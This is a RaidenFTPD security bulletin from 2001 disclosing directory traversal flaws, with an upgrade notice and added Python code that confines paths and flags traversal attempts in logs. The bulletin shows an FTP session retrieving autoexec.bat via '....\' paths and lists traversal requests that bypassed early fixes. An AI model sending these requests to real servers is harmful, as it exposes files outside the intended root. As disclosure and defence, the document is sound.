RaidenFTPD security bulletin : RSB-001

RaidenFTPD Directory Traversal Vulnerabilities
discovered on : 2001-04-30
victims : All RaidenFTPD versions prior to v2.1 build 952
solution : Upgrade to RaidenFTPD v2.2 build 221

Who should read this bulletin: Customers using RaidenFTPD v2.1 build 1~952

Impact of vulnerability: Gain access to directories and files outside of the ftp root directory

Recommendation: Customers using RaidenFTPD v2.1 build 1~952 should upgrade to v2.2 build 221 immediately

Affected Software:

RaidenFTPD v2.1 build 1~951

Patch availability
Download locations for this patch

full install http://www.raidenmaild.com/download/raidenftpd2.exe

update only download

Technical details

The following is an illustration of the problem:

> ftp localhost
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (xxxxxxxx.xx.xxx.edu:(none)): jdog
331 Password required for jdog .
Password:
[really long login banner edited out]
230 User jdog logged in , proceed.
ftp> get ....\....\autoexec.bat
200 Port command ok.
150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
226 Transfer finished successfully. Data connection closed.
ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
ftp> cd ....
250 "/.." is current directory.

This excerpt was taken from a session involving build #947. The vendor has released four builds since it was initially contacted. The following is a list of the traversal requests that still affected these intermediate builds:

CWD \....
CWD *\.....
CWD /..../
NLST ..
NLST ...
NLST \..\
NLST \...\
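The bulletin does not show how the fixed build parses client paths, so the following is an added example (not RaidenFTPD code) of the path confinement and log check a defender would put in front of a file-serving component to stop the requests shown in the session above and in the list. It goes beyond the listed cases: it treats "/" and "\" alike (the server runs on Windows), rejects any segment that is only dots, rejects wildcards in path segments, refuses to step above the root, and re-checks the resolved filesystem path. The root /srv/ftp, the names confine and scan_commands, and the sample command list are assumptions constructed for this example.

```python
import os
import re
from typing import List, Tuple

# Assumed virtual FTP root for the example (constructed, not from the bulletin).
FTP_ROOT = "/srv/ftp"

# The bulletin's session shows "...." acting as a parent-directory step, and its
# list includes "..." and ".....". Rejecting every dot-only segment of three or
# more characters avoids depending on how the OS interprets them.
_DOT_RUN = re.compile(r"^\.{3,}$")
_WILDCARDS = set("*?")


class PathRejected(ValueError):
    """Raised for any client path that must not be resolved."""


def split_ftp_path(requested: str) -> Tuple[bool, List[str]]:
    """Split a client-supplied path on both '/' and '\\' (Windows server).
    Returns (is_absolute, segments) with empty segments dropped."""
    is_absolute = requested[:1] in ("/", "\\")
    segments = [s for s in re.split(r"[\\/]+", requested) if s != ""]
    return is_absolute, segments


def confine(root: str, cwd: str, requested: str) -> str:
    """Resolve `requested` against the virtual `cwd` ('/' = root) and return
    the real filesystem path, or raise PathRejected. Never walks above root."""
    is_absolute, segments = split_ftp_path(requested)
    # Absolute paths start at the root; relative ones at the (already confined) cwd.
    stack: List[str] = [] if is_absolute else [s for s in cwd.split("/") if s]
    for seg in segments:
        if seg == ".":
            continue
        if seg == "..":
            # Rejecting (rather than silently clamping at root) gives a loggable event.
            if not stack:
                raise PathRejected("attempt to step above the FTP root: %r" % requested)
            stack.pop()
            continue
        if _DOT_RUN.match(seg):
            raise PathRejected("dot-only segment %r in %r" % (seg, requested))
        if _WILDCARDS & set(seg):
            raise PathRejected("wildcard in path segment %r" % seg)
        stack.append(seg)
    real = os.path.normpath(os.path.join(root, *stack))
    # Defence in depth: the real path must still lie under root after normalisation.
    if os.path.commonpath([root, real]) != root:
        raise PathRejected("resolved outside root: %r" % real)
    return real


_CMD_RE = re.compile(r"^(?P<cmd>CWD|NLST|LIST|RETR|STOR)\s*(?P<arg>.*)$")


def scan_commands(root: str, cwd: str, commands: List[str]) -> List[Tuple[str, str]]:
    """Run each logged FTP command argument through confine() and return
    (command, reason) for those that would be rejected. This turns the
    bulletin's pattern list into a check over a command log."""
    flagged = []
    for line in commands:
        m = _CMD_RE.match(line.strip())
        if not m:
            continue
        arg = m.group("arg") or "."
        try:
            confine(root, cwd, arg)
        except PathRejected as e:
            flagged.append((line, str(e)))
    return flagged


# Constructed sample log: the bulletin's request patterns mixed with benign traffic.
SAMPLE_COMMANDS = [
    "CWD pub",
    "RETR readme.txt",
    "CWD \\....",
    "CWD *\\.....",
    "CWD /..../",
    "NLST ..",
    "NLST ...",
    "NLST \\..\\",
    "NLST \\...\\",
    "RETR ....\\....\\autoexec.bat",
]

if __name__ == "__main__":
    for line, reason in scan_commands(FTP_ROOT, "/", SAMPLE_COMMANDS):
        print("%-32s rejected: %s" % (line, reason))
```

With the cwd at "/", eight of the ten sample commands are rejected; with the cwd at "/pub/incoming", "NLST .." is a legitimate move to "/srv/ftp/pub" and only seven are flagged, which is why the check must be applied against the session's current directory rather than to the raw argument alone.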

Disclaimer
The information provided in the RaidenFTPD security bulletin is provided "as is" without warranty of any kind. RaidenFTPD team disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall RaidenFTPD team be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RaidenFTPD team have been advised of the possibility of such damages.

Copyright © RaidenFTPD TEAM , ALL RIGHTS RESERVED

REVISION 2.2 , 2001/10/15